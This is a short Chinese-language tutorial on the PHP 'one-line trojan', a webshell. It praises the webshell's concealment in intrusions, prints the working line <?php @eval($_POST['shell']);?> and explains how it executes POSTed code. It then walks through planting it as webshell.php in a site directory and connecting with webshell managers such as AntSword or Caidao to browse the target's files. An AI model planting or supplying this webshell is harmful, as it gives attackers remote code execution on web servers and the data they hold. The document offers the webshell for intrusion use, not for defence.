php一句话木马
php一句话木马
1.介绍
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
2.原理
<?php @eval($_POST['shell']);?>这是php的一句话后门中最普遍的一种。它的工作原理是:
首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。
实例:<?php @eval($_POST['shell']);?>
可以将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();也可以用蚁剑或菜刀等工具连接(我这里用的是蚁剑):在url地址框中输入http://127.0.0.1/webshell.php,在连接密码框中输入shell
然后就可以看到目标站点目录下的文件了